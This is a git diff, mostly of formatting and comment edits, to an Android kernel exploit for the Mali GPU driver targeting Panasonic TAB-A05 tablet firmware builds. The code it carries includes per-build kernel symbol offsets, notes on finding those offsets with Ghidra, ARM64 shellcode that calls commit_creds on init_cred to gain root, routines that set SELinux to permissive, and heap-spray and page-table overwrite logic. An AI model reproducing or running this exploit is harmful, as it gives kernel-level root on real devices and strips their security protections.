diff --git a/mali_base_jm_kernel.h b/mali_base_jm_kernel.h
index 3f5a460..844c3da 100644
--- a/mali_base_jm_kernel.h
+++ b/mali_base_jm_kernel.h
@@ -831,7 +831,6 @@ struct base_jd_atom_v2 {
 // __u8 jobslot; //missing from Bifrost r16p0
 base_jd_core_req core_req;
 // __u8 renderpass_id; //missing from Bifrost r16p0
-
 };
 */
 typedef struct base_jd_atom_v2 {
@@ -1233,4 +1232,3 @@ struct base_dump_cpu_gpu_counters {
 };
 #endif /* _UAPI_BASE_JM_KERNEL_H_ */
-
diff --git a/mali_shrinker_mmap32.c b/mali_shrinker_mmap32.c
index b84c0ba..ecead8e 100644
--- a/mali_shrinker_mmap32.c
+++ b/mali_shrinker_mmap32.c
@@ -22,7 +22,7 @@
 #include
 #define LOG(fmt, ...) __android_log_print(ANDROID_LOG_ERROR, "exploit", fmt, ##__VA_ARGS__)
-#endif //SHELL
+#endif // SHELL
 #define MALI "/dev/mali0"
@@ -36,7 +36,7 @@
 #define SPRAY_NUM 64
-#define FLUSH_SIZE (0x1000 * 0x1000) //increasing = less 'out of memory' results but more crashes (default 0x1000 * 0x100)
+#define FLUSH_SIZE (0x1000 * 0x1000) // increasing = less 'out of memory' results but more crashes (default 0x1000 * 0x100)
 #define SPRAY_CPU 0
@@ -50,7 +50,7 @@
 #define NUM_TRIALS 100
-#define KERNEL_BASE 0x40080000//raven's kernel load address
+#define KERNEL_BASE 0x40080000
 #define OVERWRITE_INDEX 256
@@ -63,17 +63,17 @@
 #define ADD_COMMIT_INDEX 3
 /*
-base address = do_undefinstr - 0x1000
-COMMIT_CREDS = commit_creds - base address
-AVC_DENY= avc_denied.isra.4 - base address
-SEL_READ_ENFORCE = sel_read_enforce - base address
-SEL_READ_HANDLE_UNKNOWN = sel_read_handle_unknown - base address
+KERNEL_BASE = do_undefinstr - 0x1000
+COMMIT_CREDS = commit_creds - KERNEL_BASE
+AVC_DENY= avc_denied.isra.4 - KERNEL_BASE
+SEL_READ_ENFORCE = sel_read_enforce - KERNEL_BASE
+SEL_READ_HANDLE_UNKNOWN = sel_read_handle_unknown - KERNEL_BASE
 Need: Ghidra
 Search: prepare_kernel_cred ->
-INIT_CRED = mov - base address
+INIT_CRED = mov - KERNEL_BASE
 Search: sel_read_enforce ->
-SELINUX_ENFORCING = ldr - base address
+SELINUX_ENFORCING = ldr - KERNEL_BASE
 Need: ARM to HEX
 ADD_COMMIT = add x8, x8, #0x(Last 3 digits of INIT_CRED)
@@ -83,13 +83,16 @@ ADD_INIT = add x0, x0, #0x(Last 3 digits of INIT_CRED)
 // TAB-A05-BD 01.00.000
 #define SELINUX_ENFORCING_CTX_01_00_000 0x129d9bc
 #define SEL_READ_HANDLE_UNKNOWN_CTX_01_00_000 0x365d80 // 0xffffff80083e5d80 - 0xffffff8008080000 = 0x365d80
-#define SEL_READ_ENFORCE_CTX_01_00_000 0x3653a8 //0xffffff80083e53a8 - 0xffffff8008080000 = 0x3653A8 //add
-#define INIT_CRED_CTX_01_00_000 0x11553f0 //0xffffff80091d53f0 - 0xffffff8008080000 = 0x11553F0
-#define COMMIT_CREDS_CTX_01_00_000 0x5a120 //0xffffff80080da120 - 0xffffff8008080000 = 0x5a120
+#define SEL_READ_ENFORCE_CTX_01_00_000 0x3653a8 // 0xffffff80083e53a8 - 0xffffff8008080000 = 0x3653A8 //add
+#define INIT_CRED_CTX_01_00_000 0x11553f0 // 0xffffff80091d53f0 - 0xffffff8008080000 = 0x11553F0
+#define COMMIT_CREDS_CTX_01_00_000 0x5a120 // 0xffffff80080da120 - 0xffffff8008080000 = 0x5a120
 #define ADD_INIT_CTX_01_00_000 0x910fc000
 #define ADD_COMMIT_CTX_01_00_000 0x91048108
-//avc_denied.isra.4
-#define AVC_DENY_CTX_01_00_000 0x35acc8 //0xffffff80083dacc8 - 0xffffff8008080000 = 0x35ACC8;//add
+#define AVC_DENY_CTX_01_00_000 0x35acc8 // 0xffffff80083dacc8 - 0xffffff8008080000 = 0x35ACC8;//add
+
+/*
+ * Maintained by Syuugo
+ */
 // TAB-A05-BD 01.01.001
 #define COMMIT_CREDS_CTX_01_01_001 0x5a120
@@ -180,7 +183,7 @@ static uint64_t avc_deny;
 static uint64_t selinux_enforcing_READ = 0X0;
 static uint64_t selinux_enforcing_WRITE = 0X0;
 /*
-Overwriting SELinux to permissive
+ Overwriting SELinux to permissive
 strb wzr, [x0]
 mov x0, #0
 ret
@@ -201,15 +204,15 @@ static uint64_t reserved[TOTAL_RESERVED_SIZE/RESERVED_SIZE];
 struct base_mem_handle {
- struct {
- __u64 handle;
- } basep;
+ struct {
+ __u64 handle;
+ } basep;
 };
 struct base_mem_aliasing_info {
- struct base_mem_handle handle;
- __u64 offset;
- __u64 length;
+ struct base_mem_handle handle;
+ __u64 offset;
+ __u64 length;
 };
 static int open_dev(char* name) {
@@ -225,11 +228,11 @@ void setup_mali(int fd, int group_id) {
 if (ioctl(fd, KBASE_IOCTL_VERSION_CHECK, ¶m) < 0) {
 err(1, "version check failed\n");
 }
- //struct kbase_ioctl_set_flags set_flags = {group_id << 3};
+ // struct kbase_ioctl_set_flags set_flags = {group_id << 3};
 struct kbase_ioctl_set_flags set_flags = {0};
 if (ioctl(fd, KBASE_IOCTL_SET_FLAGS, &set_flags) < 0) {
 err(1, "set flags failed\n");
- }
+ }
 }
@@ -258,7 +261,7 @@ void jit_init(int fd, uint64_t va_pages, uint64_t trim_level, int group_id) {
 uint64_t jit_allocate(int fd, uint8_t atom_number, uint8_t id, uint64_t va_pages, uint64_t gpu_alloc_addr, uint64_t* gpu_alloc_region) {
 struct base_jit_alloc_info info = {0};
 struct base_jd_atom_v2 atom = {0};
-
+
 info.id = id;
 info.gpu_alloc_addr = gpu_alloc_addr;
 info.va_pages = va_pages;
@@ -276,7 +279,7 @@ uint64_t jit_allocate(int fd, uint8_t atom_number, uint8_t id, uint64_t va_pages
 if (ioctl(fd, KBASE_IOCTL_JOB_SUBMIT, &submit) < 0) {
 err(1, "submit job failed\n");
 }
- return *((uint64_t*)gpu_alloc_region);
+ return *((uint64_t*)gpu_alloc_region);
 }
 void jit_free(int fd, uint8_t atom_number, uint8_t id) {
@@ -295,7 +298,7 @@ void jit_free(int fd, uint8_t atom_number, uint8_t id) {
 if (ioctl(fd, KBASE_IOCTL_JOB_SUBMIT, &submit) < 0) {
 err(1, "submit job failed\n");
 }
-
+
 }
 void mem_flags_change(int fd, uint64_t gpu_addr, uint32_t flags, int ignore_results) {
@@ -436,7 +439,7 @@ void reserve_pages(int mali_fd, int pages, int nents, uint64_t* reserved_va) {
 alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR; // | (1 << 22);
 int prot = PROT_READ | PROT_WRITE;
 alloc.in.va_pages = pages;
- alloc.in.commit_pages = pages; //alloc.in.commit_pages = 0;
+ alloc.in.commit_pages = pages; // alloc.in.commit_pages = 0;
 mem_alloc(mali_fd, &alloc);
 reserved_va[i] = alloc.out.gpu_va;
 }
@@ -478,7 +481,7 @@ uint64_t alias_sprayed_regions(int mali_fd) {
 }
 alias_regions[i] = this_region;
 }
- // return (uint64_t)(alias_regions[0]);
+ //return (uint64_t)(alias_regions[0]);
 return (uint64_t)alias.out.gpu_va;
 }
@@ -540,7 +543,7 @@ uint32_t write_adrp(int rd, uint64_t pc, uint64_t label) {
 int32_t immlo = (offset >> 12) & 0x3;
 uint32_t adpr = rd & 0x1f;
 adpr |= (1 << 28);
- adpr |= (1 << 31); //op
+ adpr |= (1 << 31); // op
 adpr |= immlo << 29;
 adpr |= (immhi_mask & (immhi << 5));
 return adpr;
@@ -549,10 +552,10 @@ uint32_t write_adrp(int rd, uint64_t pc, uint64_t label) {
 void fixup_root_shell(uint64_t init_cred, uint64_t commit_cred, uint64_t read_enforce, uint32_t add_init, uint32_t add_commit) {
 uint32_t init_adpr = write_adrp(0, read_enforce, init_cred);
- //Sets x0 to init_cred
+ // Sets x0 to init_cred
 root_code[ADRP_INIT_INDEX] = init_adpr;
 root_code[ADD_INIT_INDEX] = add_init;
- //Sets x8 to commit_creds
+ // Sets x8 to commit_creds
 root_code[ADRP_COMMIT_INDEX] = write_adrp(8, read_enforce, commit_cred);
 root_code[ADD_COMMIT_INDEX] = add_commit;
 root_code[4] = 0xa9bf7bfd; // stp x29, x30, [sp, #-0x10]
@@ -563,10 +566,10 @@ void fixup_root_shell(uint64_t init_cred, uint64_t commit_cred, uint64_t read_en
 void fixup_root_shell_nop() {
- //Sets x0 to init_cred
+ // Sets x0 to init_cred
 root_code[ADRP_INIT_INDEX] = 0xD503201F;
 root_code[ADD_INIT_INDEX] = 0xD503201F;
- //Sets x8 to commit_creds
+ // Sets x8 to commit_creds
 root_code[ADRP_COMMIT_INDEX] = 0xD503201F;
 root_code[ADD_COMMIT_INDEX] = 0xD503201F;
 root_code[4] = 0xD503201F; // stp x29, x30, [sp, #-0x10]
@@ -578,10 +581,10 @@ void fixup_root_shell_nop() {
 void fixup_root_shell_un(uint64_t init_cred, uint64_t commit_cred, uint64_t read_handle_unknown, uint32_t add_init, uint32_t add_commit) {
 uint32_t init_adpr = write_adrp(0, read_handle_unknown, init_cred);
- //Sets x0 to init_cred
+ // Sets x0 to init_cred
 root_code_un[ADRP_INIT_INDEX] = init_adpr;
 root_code_un[ADD_INIT_INDEX] = add_init;
- //Sets x8 to commit_creds
+ // Sets x8 to commit_creds
 root_code_un[ADRP_COMMIT_INDEX] = write_adrp(8, read_handle_unknown, commit_cred);
 root_code_un[ADD_COMMIT_INDEX] = add_commit;
 root_code_un[4] = 0xa9bf7bfd; // stp x29, x30, [sp, #-0x10]
@@ -609,7 +612,7 @@ void write_to(int mali_fd, uint64_t gpu_addr, uint64_t value, int atom_number, e
 struct MALI_JOB_HEADER jh = {0};
 jh.is_64b = true;
 jh.type = MALI_JOB_TYPE_WRITE_VALUE;
-
+
 struct MALI_WRITE_VALUE_JOB_PAYLOAD payload = {0};
 payload.type = type;
 payload.immediate_value = value;
@@ -777,7 +780,7 @@ void select_offset() {
 fixup_root_shell(INIT_CRED_CTZ_01_02_004, COMMIT_CREDS_CTZ_01_02_004, SEL_READ_HANDLE_UNKNOWN_CTZ_01_02_004, ADD_INIT_CTZ_01_02_004, ADD_COMMIT_CTZ_01_02_004);
 return;
 }
-
+
 if (!strcmp(fingerprint, "Panasonic/TAB-A05-BA1/TAB-A05-BA1:9/01.02.005/01.02.005:user/release-keys")) {
 selinux_enforcing = SELINUX_ENFORCING_CTZ_01_02_005;
 sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_CTZ_01_02_005;
@@ -832,22 +835,22 @@ void write_shellcode(int mali_fd, int mali_fd2, uint64_t pgd, uint64_t* reserved
 //Triggers avc_denied to disable SELinux
 open("/dev/kmsg", O_RDONLY);
 */
-// uint64_t sel_read_enforce_addr = (((selinux_enforcing_READ + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT) | 0x443;
-// write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), sel_read_enforce_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
-// printf("sel_read_enforce_addr is %llx avc_deny_addr is %llx\n", sel_read_enforce_addr, avc_deny_addr);
+ //uint64_t sel_read_enforce_addr = (((selinux_enforcing_READ + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT) | 0x443;
+ //write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), sel_read_enforce_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
+ //printf("sel_read_enforce_addr is %llx avc_deny_addr is %llx\n", sel_read_enforce_addr, avc_deny_addr);
 uint64_t sel_read_handle_unknown_addr = (((sel_read_handle_unknown + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443;
 write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), sel_read_handle_unknown_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
-
-// uint64_t sel_write_enforce_addr = (((selinux_enforcing_WRITE + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT) | 0x443;
-// write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), sel_write_enforce_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
-
+
+ //uint64_t sel_write_enforce_addr = (((selinux_enforcing_WRITE + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT) | 0x443;
+ //write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), sel_write_enforce_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
+
 usleep(100000);
-
- //Call commit_creds to overwrite process credentials to gain root
+
+ // Call commit_creds to overwrite process credentials to gain root
 write_func(mali_fd2, sel_read_handle_unknown, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code_un[0]), sizeof(root_code_un)/sizeof(uint32_t));
-// write_func(mali_fd2, selinux_enforcing_READ, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code[0]), sizeof(root_code)/sizeof(uint32_t));
-// write_func(mali_fd2, selinux_enforcing_WRITE, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code[0]), sizeof(root_code)/sizeof(uint32_t));
+ //write_func(mali_fd2, selinux_enforcing_READ, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code[0]), sizeof(root_code)/sizeof(uint32_t));
+ //write_func(mali_fd2, selinux_enforcing_WRITE, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code[0]), sizeof(root_code)/sizeof(uint32_t));
 }
@@ -884,7 +887,7 @@ int trigger(int mali_fd, int mali_fd2, int* flush_idx) {
 err(1, "gpu_alloc_region mmap failed");
 }
 uint64_t jit_pages = SPRAY_PAGES;
- uint64_t jit_addr = jit_allocate(mali_fd, atom_number, jit_id, jit_pages, (uint64_t)gpu_alloc_addr, (uint64_t*)gpu_alloc_region);
+ uint64_t jit_addr = jit_allocate(mali_fd, atom_number, jit_id, jit_pages, (uint64_t)gpu_alloc_addr, (uint64_t*)gpu_alloc_region);
 atom_number++;
 mem_flags_change(mali_fd, (uint64_t)jit_addr, BASE_MEM_DONT_NEED, 0);
@@ -921,12 +924,12 @@ int trigger(int mali_fd, int mali_fd2, int* flush_idx) {
 atom_number++;
 write_selinux(mali_fd, mali_fd2, pgd, &(reserved[0]));
 usleep(100000);
- write_shellcode(mali_fd, mali_fd2, pgd, &(reserved[0]));
+ write_shellcode(mali_fd, mali_fd2, pgd, &(reserved[0]));
 usleep(100000);
 printf("time to run_enforce\n");
- run_enforce();
- run_enforce_un();
- //run_enforce_write();
+ run_enforce();
+ run_enforce_un();
+ //run_enforce_write();
 cleanup(mali_fd, pgd);
 return 0;
 }
diff --git a/midgard.h b/midgard.h
index e0ce432..d05cf25 100644
--- a/midgard.h
+++ b/midgard.h
@@ -1,7 +1,7 @@
 #ifndef MIDGARD_H
 #define MIDGARD_H
-//Generated using pandecode-standalone: https://gitlab.freedesktop.org/panfrost/pandecode-standalone
+// Generated using pandecode-standalone: https://gitlab.freedesktop.org/panfrost/pandecode-standalone
 #include
 #include
@@ -41,7 +41,7 @@ __gen_unpack_uint(const uint8_t *restrict cl, uint32_t start, uint32_t end) {
 uint64_t val = 0;
 const int width = end - start + 1;
- const uint64_t mask = (width == 64 ? ~0 : (1ull << width) - 1 );
+ const uint64_t mask = (width == 64 ? ~0 : (1ull << width) - 1);
 for (int byte = start / 8; byte <= end / 8; byte++) {
 val |= ((uint64_t) cl[byte]) << ((byte - start / 8) * 8);
@@ -64,13 +64,13 @@ enum mali_job_type {
 };
 enum mali_write_value_type {
- MALI_WRITE_VALUE_TYPE_CYCLE_COUNTER = 1,
+ MALI_WRITE_VALUE_TYPE_CYCLE_COUNTER = 1,
 MALI_WRITE_VALUE_TYPE_SYSTEM_TIMESTAMP = 2,
- MALI_WRITE_VALUE_TYPE_ZERO = 3,
- MALI_WRITE_VALUE_TYPE_IMMEDIATE_8 = 4,
- MALI_WRITE_VALUE_TYPE_IMMEDIATE_16 = 5,
- MALI_WRITE_VALUE_TYPE_IMMEDIATE_32 = 6,
- MALI_WRITE_VALUE_TYPE_IMMEDIATE_64 = 7,
+ MALI_WRITE_VALUE_TYPE_ZERO = 3,
+ MALI_WRITE_VALUE_TYPE_IMMEDIATE_8 = 4,
+ MALI_WRITE_VALUE_TYPE_IMMEDIATE_16 = 5,
+ MALI_WRITE_VALUE_TYPE_IMMEDIATE_32 = 6,
+ MALI_WRITE_VALUE_TYPE_IMMEDIATE_64 = 7,
 };
@@ -240,7 +240,7 @@ struct mali_write_value_job_packed {
 uint32_t opaque[14];
 };
-#define MALI_JOB_HEADER_header \
+#define MALI_JOB_HEADER_header \
 .is_64b = true
 #define MALI_WRITE_VALUE_JOB_LENGTH 56